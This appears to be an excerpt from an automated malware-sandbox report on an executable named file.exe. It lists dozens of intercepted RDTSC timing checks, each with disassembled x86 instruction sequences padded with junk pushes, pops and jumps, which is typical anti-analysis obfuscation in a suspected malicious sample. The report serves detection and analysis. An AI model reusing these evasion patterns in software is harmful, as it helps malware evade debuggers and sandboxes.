                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEA8C second address: FEEA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEA9A second address: FEEA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEA9F second address: FEEAA4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEBD3 second address: FEEBD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEBD8 second address: FEEBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AD8CCF449h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF022 second address: FEF03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD675h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF03D second address: FEF048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF048 second address: FEF04E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EC2B second address: F9EC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EC2F second address: F9ECA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5AD8CCD66Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F5AD8CCD66Eh 0x00000011 jmp 00007F5AD8CCD66Dh 0x00000016 pop esi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F5AD8CCD66Fh 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pushad 0x00000027 popad 0x00000028 jmp 00007F5AD8CCD66Fh 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 jmp 00007F5AD8CCD676h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF444 second address: FEF448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF448 second address: FEF44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF44E second address: FEF463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F5AD8CCF43Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF463 second address: FEF468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF468 second address: FEF472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5AD8CCF436h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF472 second address: FEF476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3F29 second address: FF3F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC195A second address: FC198C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc cx, 46B8h 0x00000011 lea eax, dword ptr [ebp+1249369Fh] 0x00000017 mov ecx, esi 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1A2D second address: FC1A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1A31 second address: FC1A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1D5D second address: E01BFE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F5AD8CCF436h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 xor cl, 00000026h 0x00000017 push dword ptr [ebp+122D00B9h] 0x0000001d mov edx, esi 0x0000001f call dword ptr [ebp+122D178Ch] 0x00000025 pushad 0x00000026 jmp 00007F5AD8CCF43Dh 0x0000002b xor eax, eax 0x0000002d pushad 0x0000002e sbb di, CCF1h 0x00000033 cmc 0x00000034 popad 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop edx 0x0000003c mov dword ptr [ebp+122D32C7h], edx 0x00000042 popad 0x00000043 mov dword ptr [ebp+122D3890h], eax 0x00000049 mov dword ptr [ebp+122D32C7h], esi 0x0000004f jns 00007F5AD8CCF43Ch 0x00000055 mov esi, 0000003Ch 0x0000005a jbe 00007F5AD8CCF442h 0x00000060 jnl 00007F5AD8CCF43Ch 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a mov dword ptr [ebp+122D32C7h], edi 0x00000070 lodsw 0x00000072 cmc 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 cmc 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c stc 0x0000007d mov dword ptr [ebp+122D2466h], edx 0x00000083 push eax 0x00000084 pushad 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F5AD8CCF447h 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F1D second address: FC1F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F23 second address: FC1F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jo 00007F5AD8CCF436h 0x00000016 jo 00007F5AD8CCF436h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F48 second address: FC1F8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5AD8CCD666h 0x00000009 jc 00007F5AD8CCD666h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F5AD8CCD670h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5AD8CCD678h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F8A second address: FC1F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F90 second address: FC1FAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 js 00007F5AD8CCD66Ch 0x0000000f push 10ACEBF8h 0x00000014 push edi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC21F1 second address: FC220B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCF446h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC27C0 second address: FC27C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC27C4 second address: FC27D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC28DD second address: FC28E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2B85 second address: FC2B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2B8B second address: F9EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F5AD8CCD670h 0x0000000b pop eax 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F5AD8CCD66Ah 0x00000015 and edx, dword ptr [ebp+122D39CCh] 0x0000001b pop edx 0x0000001c lea eax, dword ptr [ebp+124936E3h] 0x00000022 mov dword ptr [ebp+122D2FC5h], ecx 0x00000028 mov edx, dword ptr [ebp+122D1F1Fh] 0x0000002e push eax 0x0000002f jmp 00007F5AD8CCD673h 0x00000034 mov dword ptr [esp], eax 0x00000037 push esi 0x00000038 and ch, FFFFFF8Dh 0x0000003b pop edx 0x0000003c lea eax, dword ptr [ebp+1249369Fh] 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007F5AD8CCD668h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c mov dh, 52h 0x0000005e jmp 00007F5AD8CCD66Fh 0x00000063 push eax 0x00000064 ja 00007F5AD8CCD681h 0x0000006a mov dword ptr [esp], eax 0x0000006d call dword ptr [ebp+122DB7C5h] 0x00000073 pushad 0x00000074 jmp 00007F5AD8CCD675h 0x00000079 push eax 0x0000007a push edx 0x0000007b ja 00007F5AD8CCD666h 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF325B second address: FF325F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F719A3 second address: F719A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F719A9 second address: F719BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F5AD8CCF43Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD554 second address: FFD56A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5AD8CCD66Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD56A second address: FFD56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC1F6 second address: FFC1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC4C3 second address: FFC4D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC4D1 second address: FFC507 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5AD8CCD677h 0x00000008 jmp 00007F5AD8CCD671h 0x0000000d jmp 00007F5AD8CCD672h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC507 second address: FFC511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5AD8CCF436h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC93C second address: FFC97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F5AD8CCD678h 0x0000000b pushad 0x0000000c jc 00007F5AD8CCD666h 0x00000012 jno 00007F5AD8CCD666h 0x00000018 jmp 00007F5AD8CCD66Dh 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD1F4 second address: FFD1FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000F9F second address: 1000FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003ECB second address: 1003ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003BBC second address: 1003BCD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AD8CCD666h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005D6D second address: 1005D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005D7C second address: 1005D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5AD8CCD675h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B196 second address: 100B19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B477 second address: 100B47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B47D second address: 100B481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B5CA second address: 100B5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jl 00007F5AD8CCD666h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B5EC second address: 100B5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B5F0 second address: 100B614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AD8CCD676h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B614 second address: 100B61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B61C second address: 100B620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B8C0 second address: 100B8DE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5AD8CCF43Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5AD8CCF45Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F5AD8CCF436h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B8DE second address: 100B8F4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5AD8CCD666h 0x00000008 jo 00007F5AD8CCD666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC25F8 second address: FC25FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC25FE second address: FC266B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5AD8CCD66Ah 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+1247E099h] 0x00000015 mov ebx, dword ptr [ebp+124936DEh] 0x0000001b jmp 00007F5AD8CCD672h 0x00000020 add eax, ebx 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F5AD8CCD668h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov dword ptr [ebp+1246B519h], ebx 0x00000042 push eax 0x00000043 pushad 0x00000044 push ecx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 pop ecx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F5AD8CCD66Fh 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC266B second address: FC266F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC266F second address: FC26C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F5AD8CCD668h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000004h 0x00000026 mov ecx, 5FAD4974h 0x0000002b nop 0x0000002c jmp 00007F5AD8CCD673h 0x00000031 push eax 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 jns 00007F5AD8CCD666h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC26C0 second address: FC26C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FCA1 second address: 100FCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD673h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FCBB second address: 100FCC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FE26 second address: 100FE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FF87 second address: 100FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FF91 second address: 100FF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FF97 second address: 100FFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F5AD8CCF436h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFA7 second address: 100FFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5AD8CCD673h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFC5 second address: 100FFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFD1 second address: 100FFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFD5 second address: 100FFE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FFE5 second address: 1010028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F5AD8CCD693h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jg 00007F5AD8CCD666h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10142E0 second address: 10142F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10142F2 second address: 101430E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCD678h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D74 second address: 1013D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D78 second address: 1013D7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D7E second address: 1013D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013D84 second address: 1013D8E instructions: 0x00000000 rdtsc 0x00000002 je 00007F5AD8CCD66Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A2F5 second address: 101A2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A2F9 second address: 101A2FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A43C second address: 101A45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AD8CCF442h 0x0000000c jns 00007F5AD8CCF436h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B163 second address: 101B16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
